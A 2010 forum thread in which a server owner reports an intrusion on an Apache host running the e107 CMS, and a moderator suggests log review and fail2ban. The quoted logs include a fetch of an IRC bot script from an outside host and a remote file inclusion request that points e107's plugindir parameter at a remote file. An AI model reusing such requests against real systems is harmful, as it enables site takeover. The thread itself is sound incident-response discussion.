| Author |
|
Dutchie
Joined: 06 Jun 2010
Posts: 3
|
 Posted: Sun 06 Jun '10 20:31 Post subject: Weird stuff happening in startup |
 |
|
Hi,
I hope someone can help me with this one. For some reason I noticed that my server wasn't behaving as expected. I tried to log in on my private forum but the server was unresponsive. There is also an e107 CMS running on this server.
After logging in through ssh I checked the error log and found entries indicating a GET of a script:
| Code: | [Sun Jun 06 20:19:58 2010] [notice] Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch configured -- resuming normal operations
[Sun Jun 06 20:19:58 2010] [info] Server built: Mar 28 2010 18:03:05
[Sun Jun 06 20:19:58 2010] [debug] prefork.c(1032): AcceptMutex: sysvsem (default: sysvsem)
--2010-06-06 20:20:02-- http://xxx.podgorz.org/xxx/shb.pl
|
This downloaded script (shb.pl) is written into the /tmp and tries to connect to an irc channel, but can't since the outgoing traffic is blocked by a firewall rule.
Can anyone tell me where to start looking for where this comes from?
And more important, how to get this from my server?
Thanks in advance! |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7306
Location: Germany, Next to Hamburg
|
| Posted: Mon 07 Jun '10 11:10 Post subject: |
|
|
At first you should login into your server (ssh) and delete that file. If you can't login into the server ask your Administrator to delete that file. You should search your logs like system log, ssh log, ftp log, access log and error log from apache to see where the attacker might broke into your system.
Maybe a linux forum is a better forum to solve your problem since that is not apache related more to your OS or the websoftware you use. |
|
| Back to top |
|
Dutchie
Joined: 06 Jun 2010
Posts: 3
|
| Posted: Mon 07 Jun '10 11:31 Post subject: |
|
|
I stopped Apache, since the fetching of the script started as soon as Apache started.
The script that has been trying to be fetched is like this one: http://pastie.org/pastes/972323
It is indeed not an Apache problem, as I found out digging through the logs, but a vulnerability in e107 in the version of before 27 May 2010.
Now the server is still hammered by Russian servers, but since the php script with the bug is removed, they can't do much.
Part of trick they used was:
| Code: | 189.108.xxx.xxx - - [06/Jun/2010:21:15:10 +0400] "GET /eplugins/content/handlers/content_convert_class.php/content_convert_class.php?plugindir=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0"
|
Anyway, I solved it (with a reinstall of the latest version of e107), but since these kind of attacks are platform independent I thought to mention all the results of my findings so far.
Thanks for your quick reply, James Blond! |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7306
Location: Germany, Next to Hamburg
|
| Posted: Mon 07 Jun '10 15:04 Post subject: |
|
|
| Dutchie wrote: |
Now the server is still hammered by Russian servers, but since the php script with the bug is removed, they can't do much.
|
Maybe you should think of installting fail2ban. That would reduce the hammering on apache and save CPU usage. |
|
| Back to top |
|
Dutchie
Joined: 06 Jun 2010
Posts: 3
|
| Posted: Wed 09 Jun '10 20:40 Post subject: |
|
|
Thanks for the tip, I've installed a similar solution. The server is much happier now.  |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7306
Location: Germany, Next to Hamburg
|
| Posted: Thu 10 Jun '10 10:05 Post subject: |
|
|
What did you install? I wanna know  |
|
| Back to top |
|
JamesSimon
Joined: 18 Jun 2010
Posts: 1
Location: Las Vegas
|
| Posted: Fri 18 Jun '10 9:12 Post subject: |
|
|
| so any solution mentioned in here? cause i cant find any.. |
|
| Back to top |
|
